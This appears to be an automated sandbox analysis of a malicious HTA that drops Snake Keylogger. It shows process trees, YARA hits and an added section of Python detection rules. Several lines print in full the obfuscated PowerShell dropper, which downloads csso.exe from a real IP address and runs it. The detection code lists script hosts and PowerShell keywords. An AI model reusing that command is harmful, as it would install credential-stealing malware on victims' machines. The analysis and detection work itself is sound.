                    Source: C:\Users\user\AppData\Roaming\csso.exe | Code function: 6_2_0005878F
                    Source: C:\Users\user\AppData\Roaming\csso.exe | Code function: 6_2_00038808
                    Source: C:\Users\user\AppData\Roaming\csso.exe | Code function: 6_2_00056844
                    Source: C:\Users\user\AppData\Roaming\csso.exe | Code function: 6_2_000A0857
                    Source: C:\Users\user\AppData\Roaming\csso.exe | Code function: 6_2_00088889
                    Source: C:\Users\user\AppData\Roaming\csso.exe | Code function: 6_2_0004CB21
                    Source: C:\Users\user\AppData\Roaming\csso.exe | Code function: 6_2_00056DB6
                    Source: C:\Users\user\AppData\Roaming\csso.exe | Code function: 6_2_00036F9E
                    Source: C:\Users\user\AppData\Roaming\csso.exe | Code function: 6_2_00033030
                    Source: C:\Users\user\AppData\Roaming\csso.exe | Code function: 6_2_00043187
                    Source: C:\Users\user\AppData\Roaming\csso.exe | Code function: 6_2_0004F1D9
                    Source: C:\Users\user\AppData\Roaming\csso.exe | Code function: 6_2_00021287
                    Source: C:\Users\user\AppData\Roaming\csso.exe | Code function: 6_2_00041484
                    Source: C:\Users\user\AppData\Roaming\csso.exe | Code function: 6_2_00035520
                    Source: C:\Users\user\AppData\Roaming\csso.exe | Code function: 6_2_00047696
                    Source: C:\Users\user\AppData\Roaming\csso.exe | Code function: 6_2_00035760
                    Source: C:\Users\user\AppData\Roaming\csso.exe | Code function: 6_2_00041978
                    Source: C:\Users\user\AppData\Roaming\csso.exe | Code function: 6_2_00059AB5
                    Source: C:\Users\user\AppData\Roaming\csso.exe | Code function: 6_2_00041D90
                    Source: C:\Users\user\AppData\Roaming\csso.exe | Code function: 6_2_0004BDA6
                    Source: C:\Users\user\AppData\Roaming\csso.exe | Code function: 6_2_000A7DDB
                    Source: C:\Users\user\AppData\Roaming\csso.exe | Code function: 6_2_0002DF00
                    Source: C:\Users\user\AppData\Roaming\csso.exe | Code function: 6_2_00033FE0
                    Source: C:\Users\user\AppData\Roaming\csso.exe | Code function: 6_2_00A728F0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_0245C168
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_0245CAB0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_024519B8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_02457E68
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_02454F08
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_02452DD1
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_0245CAAE
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_0245B9DC
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_0245B9E0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_02457E66
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_02454EF8
                    Source: C:\Users\user\AppData\Roaming\csso.exe | Code function: String function: 00027DE1 appears 35 times
                    Source: C:\Users\user\AppData\Roaming\csso.exe | Code function: String function: 00040AE3 appears 70 times
                    Source: C:\Users\user\AppData\Roaming\csso.exe | Code function: String function: 00048900 appears 42 times
                    Source: C:\Windows\SysWOW64\mshta.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
                    Source: 7.2.RegSvcs.exe.380000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 7.2.RegSvcs.exe.380000.0.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 6.2.csso.exe.30f0000.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 6.2.csso.exe.30f0000.1.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 6.2.csso.exe.30f0000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 6.2.csso.exe.30f0000.1.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 00000007.00000002.2525234077.0000000000382000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 00000006.00000002.1396918507.00000000030F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 00000006.00000002.1396918507.00000000030F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: Process Memory Space: csso.exe PID: 7620, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: Process Memory Space: RegSvcs.exe PID: 7656, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 6.2.csso.exe.30f0000.1.raw.unpack, UltraSpeed.cs | Cryptographic APIs: 'TransformFinalBlock'
                    Source: 6.2.csso.exe.30f0000.1.raw.unpack, COVIDPickers.cs | Cryptographic APIs: 'TransformFinalBlock'
                    Source: classification engine | Classification label: mal100.troj.spyw.expl.evad.winHTA@14/15@2/3
                    Source: C:\Users\user\AppData\Roaming\csso.exe | Code function: 6_2_0008A06A GetLastError,FormatMessageW
                    Source: C:\Users\user\AppData\Roaming\csso.exe | Code function: 6_2_000781CB AdjustTokenPrivileges,CloseHandle
                    Source: C:\Users\user\AppData\Roaming\csso.exe | Code function: 6_2_000787E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError
                    Source: C:\Users\user\AppData\Roaming\csso.exe | Code function: 6_2_0008B333 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode
                    Source: C:\Users\user\AppData\Roaming\csso.exe | Code function: 6_2_0009EE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle
                    Source: C:\Users\user\AppData\Roaming\csso.exe | Code function: 6_2_0008C397 CoInitialize,CoCreateInstance,CoUninitialize
                    Source: C:\Users\user\AppData\Roaming\csso.exe | Code function: 6_2_00024E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\csso[1].exe
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Mutant created: NULL
                    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7408:120:WilError_03
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_eo40twkl.1zn.ps1
                    Source: C:\Windows\SysWOW64\mshta.exe | File read: C:\Users\user\Desktop\desktop.ini
                    Source: C:\Windows\SysWOW64\mshta.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                    Source: RegSvcs.exe, 00000007.00000002.2527369873.0000000002730000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2528773655.000000000363D000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2527369873.0000000002700000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2527369873.00000000026F0000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2527369873.0000000002723000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2527369873.000000000270E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                    Source: uhg.hta | Virustotal: Detection: 33%
                    Source: uhg.hta | ReversingLabs: Detection: 23%
                    Source: unknown | Process created: C:\Windows\SysWOW64\mshta.exe mshta.exe "C:\Users\user\Desktop\uhg.hta"
                    Source: C:\Windows\SysWOW64\mshta.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/c PoWeRsHelL.exe -Ex bypASs -NOp -w 1 -C DeviceCRedENTiAldEploYMEnt.EXe ; Iex($(ieX('[sySteM.Text.eNCoDING]'+[cHAr]0x3A+[CHaR]58+'uTF8.getStRING([SYSteM.coNVert]'+[cHAr]58+[cHar]58+'FroMBASE64sTrIng('+[CHaR]0X22+'JGogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZEQtdFlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVtQkVSRGVmaU5pdGlvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJMbW9uLmRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSndGRixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRHlwLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgekopOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIkh1d0pyTXVkSEwiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lc1BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZWR2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGo6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8yMy45NS4yMzUuMjgvNTAvY3Nzby5leGUiLCIkZU5WOkFQUERBVEFcY3Nzby5leGUiLDAsMCk7U3RBUlQtU0xFZXAoMyk7aU5Wb0tlLUl0ZW0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFblY6QVBQREFUQVxjc3NvLmV4ZSI='+[cHar]34+'))')))"
                    Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe PoWeRsHelL.exe -Ex bypASs -NOp -w 1 -C DeviceCRedENTiAldEploYMEnt.EXe ; Iex($(ieX('[sySteM.Text.eNCoDING]'+[cHAr]0x3A+[CHaR]58+'uTF8.getStRING([SYSteM.coNVert]'+[cHAr]58+[cHar]58+'FroMBASE64sTrIng('+[CHaR]0X22+'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'+[cHar]34+'))')))"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hbmngfjp\hbmngfjp.cmdline"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC24D.tmp" "c:\Users\user\AppData\Local\Temp\hbmngfjp\CSCC4E96BC32174751BC6DB24E42E04ED1.TMP"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Users\user\AppData\Roaming\csso.exe "C:\Users\user\AppData\Roaming\csso.exe"
                    Source: C:\Users\user\AppData\Roaming\csso.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Roaming\csso.exe"
                    Source: C:\Windows\SysWOW64\mshta.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/c PoWeRsHelL.exe -Ex bypASs -NOp -w 1 -C DeviceCRedENTiAldEploYMEnt.EXe ; Iex($(ieX('[sySteM.Text.eNCoDING]'+[cHAr]0x3A+[CHaR]58+'uTF8.getStRING([SYSteM.coNVert]'+[cHAr]58+[cHar]58+'FroMBASE64sTrIng('+[CHaR]0X22+'JGogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZEQtdFlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVtQkVSRGVmaU5pdGlvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJMbW9uLmRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSndGRixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRHlwLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgekopOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIkh1d0pyTXVkSEwiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lc1BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZWR2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGo6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8yMy45NS4yMzUuMjgvNTAvY3Nzby5leGUiLCIkZU5WOkFQUERBVEFcY3Nzby5leGUiLDAsMCk7U3RBUlQtU0xFZXAoMyk7aU5Wb0tlLUl0ZW0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFblY6QVBQREFUQVxjc3NvLmV4ZSI='+[cHar]34+'))')))"
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe PoWeRsHelL.exe -Ex bypASs -NOp -w 1 -C DeviceCRedENTiAldEploYMEnt.EXe ; Iex($(ieX('[sySteM.Text.eNCoDING]'+[cHAr]0x3A+[CHaR]58+'uTF8.getStRING([SYSteM.coNVert]'+[cHAr]58+[cHar]58+'FroMBASE64sTrIng('+[CHaR]0X22+'JGogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZEQtdFlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVtQkVSRGVmaU5pdGlvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJMbW9uLmRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSndGRixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRHlwLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgekopOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIkh1d0pyTXVkSEwiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lc1BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZWR2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGo6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8yMy45NS4yMzUuMjgvNTAvY3Nzby5leGUiLCIkZU5WOkFQUERBVEFcY3Nzby5leGUiLDAsMCk7U3RBUlQtU0xFZXAoMyk7aU5Wb0tlLUl0ZW0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFblY6QVBQREFUQVxjc3NvLmV4ZSI='+[cHar]34+'))')))"Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hbmngfjp\hbmngfjp.cmdline"Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\csso.exe "C:\Users\user\AppData\Roaming\csso.exe" Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC24D.tmp" "c:\Users\user\AppData\Local\Temp\hbmngfjp\CSCC4E96BC32174751BC6DB24E42E04ED1.TMP"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\csso.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Roaming\csso.exe" Jump to behavior
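                    The chain above (mshta.exe to cmd.exe to powershell.exe, which forks csc.exe/cvtres.exe and then csso.exe, which in turn starts RegSvcs.exe) is what the report's Sigma hits "Suspicious MSHTA Child Process" and "Dot net compiler compiles file from suspicious location" key on. The last hop deserves its own rule: RegSvcs.exe is created with csso.exe's command line rather than its own, the usual footprint of a .NET host process that has been started suspended and had another payload written into it. The Python below is an added example, not part of the report or of Joe Sandbox. It rebuilds the process tree from constructed Sysmon-style process-creation events (image paths and command lines are copied from the entries above; the pids/ppids are made up and the base64 payload inside the PowerShell command line is replaced by the placeholder <base64 omitted>) and evaluates four rules, including a mixed-case heuristic in the spirit of the report's "PowerShell case anomaly found" signature. The keyword list and the threshold of two odd-cased tokens are my own assumptions.

```python
"""Process-tree rules for the uhg.hta chain, run over constructed process-creation events."""
import ntpath
import re

# PowerShell command line from the report, with the base64 payload elided (constructed edit).
PS_CMD = ("PoWeRsHelL.exe -Ex bypASs -NOp -w 1 -C DeviceCRedENTiAldEploYMEnt.EXe ; "
          "Iex($(ieX('[sySteM.Text.eNCoDING]'+[cHAr]0x3A+[CHaR]58+'uTF8.getStRING([SYSteM.coNVert]'"
          "+[cHAr]58+[cHar]58+'FroMBASE64sTrIng('+[CHaR]0X22+'<base64 omitted>'+[cHar]34+'))')))")

# Constructed events: image paths and command lines as in the report, pids/ppids invented.
EVENTS = [
    dict(pid=1, ppid=0, image=r"C:\Windows\SysWOW64\mshta.exe",
         cmdline=r'mshta.exe "C:\Users\user\Desktop\uhg.hta"'),
    dict(pid=2, ppid=1, image=r"C:\Windows\SysWOW64\cmd.exe",
         cmdline=r'"C:\Windows\system32\cmd.exe" "/c ' + PS_CMD + '"'),
    dict(pid=3, ppid=2, image=r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
         cmdline=PS_CMD),
    dict(pid=4, ppid=3, image=r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe",
         cmdline=r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hbmngfjp\hbmngfjp.cmdline"'),
    dict(pid=5, ppid=4, image=r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe",
         cmdline=r'C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC24D.tmp" "c:\Users\user\AppData\Local\Temp\hbmngfjp\CSCC4E96BC32174751BC6DB24E42E04ED1.TMP"'),
    dict(pid=6, ppid=3, image=r"C:\Users\user\AppData\Roaming\csso.exe",
         cmdline=r'"C:\Users\user\AppData\Roaming\csso.exe"'),
    dict(pid=7, ppid=6, image=r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe",
         cmdline=r'"C:\Users\user\AppData\Roaming\csso.exe"'),
]

# Children of mshta.exe that warrant an alert (assumed list, extend per environment).
SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
                "rundll32.exe", "regsvr32.exe", "mshta.exe"}
# Tokens whose mIxEd casing betrays hand-obfuscated PowerShell (assumed list).
PS_KEYWORDS = {"powershell.exe", "powershell", "bypass", "executionpolicy", "ex", "ep", "nop",
               "noprofile", "noni", "noninteractive", "w", "windowstyle", "hidden", "c",
               "command", "enc", "encodedcommand", "iex", "invoke-expression", "char",
               "frombase64string"}


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path (ntpath also works on non-Windows hosts)."""
    return ntpath.basename(path).lower()


def first_token(cmdline: str) -> str:
    """Image name the command line claims to run: its first quoted or bare argument."""
    m = re.match(r'\s*(?:"([^"]+)"|(\S+))', cmdline)
    return basename(m.group(1) or m.group(2)) if m else ""


def odd_case(token: str) -> bool:
    """True for casing that is neither lower, UPPER nor Capitalized."""
    return token not in (token.lower(), token.upper(), token.capitalize())


def run_rules(events):
    """Return (rule_name, pid) pairs for every event that trips a rule."""
    by_pid = {e["pid"]: e for e in events}
    hits = []
    for e in events:
        parent = by_pid.get(e["ppid"])
        img = basename(e["image"])
        pimg = basename(parent["image"]) if parent else ""
        cmd = e["cmdline"]
        # 1. mshta.exe should not be spawning script hosts or shells.
        if pimg == "mshta.exe" and img in SCRIPT_HOSTS:
            hits.append(("mshta_child_process", e["pid"]))
        # 2. PowerShell driving csc.exe on a Temp path: Add-Type with inline C# (P/Invoke stub).
        if img == "csc.exe" and pimg == "powershell.exe" and re.search(r"\\appdata\\local\\temp\\", cmd, re.I):
            hits.append(("csc_from_suspicious_location", e["pid"]))
        # 3. The image on disk is not the image the command line names: injected/hollowed host.
        if first_token(cmd) and first_token(cmd) != img:
            hits.append(("image_commandline_mismatch", e["pid"]))
        # 4. Case anomaly: known PowerShell switches/cmdlets written in random case.
        if img == "powershell.exe" or "powershell" in cmd.lower():
            odd = [t for t in re.findall(r"[A-Za-z][\w.-]*", cmd)
                   if t.lower() in PS_KEYWORDS and odd_case(t)]
            if len(odd) >= 2:  # threshold is an assumption
                hits.append(("powershell_case_anomaly", e["pid"]))
    return hits


def ancestry(events, pid):
    """Image names from the root of the tree down to pid."""
    by_pid = {e["pid"]: e for e in events}
    chain = []
    while pid in by_pid:
        chain.append(ntpath.basename(by_pid[pid]["image"]))
        pid = by_pid[pid]["ppid"]
    return list(reversed(chain))


if __name__ == "__main__":
    for rule, pid in run_rules(EVENTS):
        print(f"{rule:32s} pid={pid}  {' > '.join(ancestry(EVENTS, pid))}")
```

Rule 3 is the one that costs the least and catches the most here: a process whose on-disk image is RegSvcs.exe but whose command line is "C:\Users\user\AppData\Roaming\csso.exe" has no benign explanation, and the same check flags every RunPE-style loader regardless of which .NET host it picks. Rule 2 needs a suppression list in real estates, because Add-Type with inline C# is also used by legitimate administration scripts.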
                    Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: iertutil.dll
                    Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: wldp.dll
                    Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: mshtml.dll
                    Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: sspicli.dll
                    Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: powrprof.dll
                    Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: winhttp.dll
                    Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: wkscli.dll
                    Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: netutils.dll
                    Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: umpdc.dll
